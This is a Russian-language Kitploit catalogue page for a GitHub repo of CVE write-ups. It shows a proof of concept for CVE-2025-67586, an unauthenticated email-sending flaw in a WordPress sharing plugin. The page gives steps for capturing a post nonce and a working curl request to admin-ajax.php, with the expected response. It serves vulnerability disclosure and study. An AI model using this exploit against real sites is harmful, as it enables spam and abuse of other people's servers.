Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE — writeups for (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986) | Kitploit
Инструменты/GitHubGitHub/r0xtsec/cve
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubr0xtsec/cve

CVE

writeups for (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE

Разборы уязвимостей (CVE-2025-67586, CVE-2025-67985, CVE-2025-67986)

root@kitploit:~
--------------   CVE-2025-67586 Эксплойт PoC   --------------
  • Название эксплойта: WordPress Plugin 5.2.0 - Нарушенный контроль доступа
  • Ссылка на ПО: https://wordpress.org/plugins/highlight-and-share/
  • Версия: <= 5.2.0 (ТРЕБУЕТСЯ)
  • CVE: CVE-2025-67586

==> Описание Уязвимость нарушенного контроля доступа существует в плагине WordPress, разработанном DLX Plugins. Плагин предоставляет неаутентифицированное AJAX-действие, которое позволяет злоумышленникам злоупотреблять функциональностью «Поделиться по email» без надлежащих проверок разрешений.

Неаутентифицированный злоумышленник может повторно использовать действующий одноразовый токен записи (post nonce) для запуска запросов на отправку email, что приводит к несанкционированной отправке писем (спам / злоупотребление) без аутентификации пользователя.

==> Требуемые привилегии Нет (неаутентифицированный)

==> Подтверждение концепции (PoC)

Шаг 1: Выберите веб-сайт с установленным плагином

Шаг 2: Получите действующий одноразовый токен (nonce)

  1. Откройте открытую запись (пост).
  2. Выделите текст и нажмите Поделиться по email.
  3. Откройте Инструменты разработчика → Сеть → XHR.
  4. Отправьте email один раз.
  5. Захватите запрос, содержащий: action=has_email_social_modal nonce= post_id=

Шаг 3: Эксплойт через неаутентифицированный запрос

bash команда: (замените URL веб-сайта, URL записи и nonce)

curl -s -i -X POST 'http://localhost/wp-admin/admin-ajax.php'
-d 'action=has_email_form_submission'
-d 'formData[postId]='
-d 'formData[permalink]=http://localhost/?p='
-d 'formData[nonce]='
-d 'formData[toEmail]=[email protected]'
-d 'formData[subject]=PoC'
-d 'formData[shareText]=POC test'
-d 'formData[emailShareType]=selection'
--compressed

--> Ожидаемый JSON-ответ:

{ "success": true, "data": { "errors": false, "message_title": "Этот пост был отправлен!", "message_body": "Вы отправили этот пост на [email protected]", "message_subject": "[Отправленный пост] <НАЗВАНИЕ ЗАПИСИ>", "message_source_name": "Имя сайта", "message_source_email": "[email protected]" } }

Скачать инструмент